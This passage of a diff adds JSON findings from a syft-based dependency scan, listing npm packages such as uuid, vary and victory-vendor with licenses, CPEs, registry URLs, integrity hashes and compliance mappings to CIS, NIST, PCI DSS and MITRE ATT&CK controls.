"7776752fe1d43a3e", + "name": "update-browserslist-db", + "version": "1.2.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:update-browserslist-db:update-browserslist-db:1.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:update-browserslist-db:update_browserslist_db:1.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:update_browserslist_db:update-browserslist-db:1.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:update_browserslist_db:update_browserslist_db:1.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:update-browserslist:update-browserslist-db:1.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:update-browserslist:update_browserslist_db:1.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:update_browserslist:update-browserslist-db:1.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:update_browserslist:update_browserslist_db:1.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:update:update-browserslist-db:1.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:update:update_browserslist_db:1.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/update-browserslist-db@1.2.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.2.3.tgz", + "integrity": "sha512-Js0m9cx+qOgDxo0eMiFGEueWztz+d4+M3rGlmKPT+T4IS/jP4ylw3Nwpu6cpTTP8R1MAC1kF4VbdLt3ARf209w==", + "dependencies": { + "escalade": "^3.2.0", + "picocolors": "^1.1.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "1ae47d19bb25f29a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: util-deprecate 1.0.2", + "title": "util-deprecate 1.0.2", + "description": "Package discovered: util-deprecate 1.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "aac5900c84ec45ff", + "name": "util-deprecate", + "version": "1.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:util-deprecate:util-deprecate:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:util-deprecate:util_deprecate:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:util_deprecate:util-deprecate:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:util_deprecate:util_deprecate:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:util:util-deprecate:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:util:util_deprecate:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/util-deprecate@1.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", + "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ea9355f8957e8bab", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: utils-merge 1.0.1", + "title": "utils-merge 1.0.1", + "description": "Package discovered: utils-merge 1.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "4f715b1e9b38109a", + "name": "utils-merge", + "version": "1.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:utils-merge:utils-merge:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:utils-merge:utils_merge:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:utils_merge:utils-merge:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:utils_merge:utils_merge:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:utils:utils-merge:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:utils:utils_merge:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/utils-merge@1.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/utils-merge/-/utils-merge-1.0.1.tgz", + "integrity": "sha512-pMZTvIkT1d+TFGvDOqodOclx0QWkkgi6Tdoa8gC8ffGAAqz9pzPTZWAybbsHHoED/ztMtkv/VoYTYyShUn81hA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "236364fea165c402", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: uuid 10.0.0", + "title": "uuid 10.0.0", + "description": "Package discovered: uuid 10.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "21b622d3d64a2c86", + "name": "uuid", + "version": "10.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:uuid:uuid:10.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/uuid@10.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/uuid/-/uuid-10.0.0.tgz", + "integrity": "sha512-8XkAphELsDnEGrDxUOHB3RGvXz6TeuYSGEZBOjtTtPm2lwhGBjLgOzLHB63IUWfBpNucQjND6d3AOudO+H3RWQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "2fb790bc55d11030", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: uuid 8.3.2", + "title": "uuid 8.3.2", + "description": "Package discovered: uuid 8.3.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "8cf0c19ede45d1bc", + "name": "uuid", + "version": "8.3.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:uuid:uuid:8.3.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/uuid@8.3.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "3e2f0913d0055c91", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: uuid 9.0.1", + "title": "uuid 9.0.1", + "description": "Package discovered: uuid 9.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "0bd59342bab05265", + "name": "uuid", + "version": "9.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:uuid:uuid:9.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/uuid@9.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz", + "integrity": "sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "4e3576c544465abd", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: vary 1.1.2", + "title": "vary 1.1.2", + "description": "Package discovered: vary 1.1.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "2fc27b955ce3ef5d", + "name": "vary", + "version": "1.1.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:vary:vary:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/vary@1.1.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/vary/-/vary-1.1.2.tgz", + "integrity": "sha512-BNGbWLfd0eUPabhkXUVm0j8uuvREyTh5ovRa/dyow/BqAbZJyC+5fU+IzQOzmAKzYqYRAISoRhdQr3eIZ/PXqg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "60e43c65d8e9a8e6", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: victory-vendor 36.9.2", + "title": "victory-vendor 36.9.2", + "description": "Package discovered: victory-vendor 36.9.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "14c55cee8eb4e77f", + "name": "victory-vendor", + "version": "36.9.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT AND ISC", + "spdxExpression": "MIT AND ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:victory-vendor:victory-vendor:36.9.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:victory-vendor:victory_vendor:36.9.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:victory_vendor:victory-vendor:36.9.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:victory_vendor:victory_vendor:36.9.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:victory:victory-vendor:36.9.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:victory:victory_vendor:36.9.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/victory-vendor@36.9.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/victory-vendor/-/victory-vendor-36.9.2.tgz", + "integrity": "sha512-PnpQQMuxlwYdocC8fIJqVXvkeViHYzotI+NJrCuav0ZYFoq912ZHBk3mCeuj+5/VpodOjPe1z0Fk2ihgzlXqjQ==", + "dependencies": { + "@types/d3-array": "^3.0.3", + "@types/d3-ease": "^3.0.0", + "@types/d3-interpolate": "^3.0.1", + "@types/d3-scale": "^4.0.2", + "@types/d3-shape": "^3.1.0", + "@types/d3-time": "^3.0.0", + "@types/d3-timer": "^3.0.0", + "d3-array": "^3.1.6", + "d3-ease": "^3.0.1", + "d3-interpolate": "^3.0.1", + "d3-scale": "^4.0.2", + "d3-shape": "^3.1.0", + "d3-time": "^3.0.0", + "d3-timer": "^3.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a846a040ec49fd72", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: vite-compatible-readable-stream 3.6.1", + "title": "vite-compatible-readable-stream 3.6.1", + "description": "Package discovered: vite-compatible-readable-stream 3.6.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "874d0721c00b1770", + "name": "vite-compatible-readable-stream", + "version": "3.6.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:vite-compatible-readable-stream:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:vite-compatible-readable-stream:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:vite_compatible_readable_stream:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:vite_compatible_readable_stream:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": 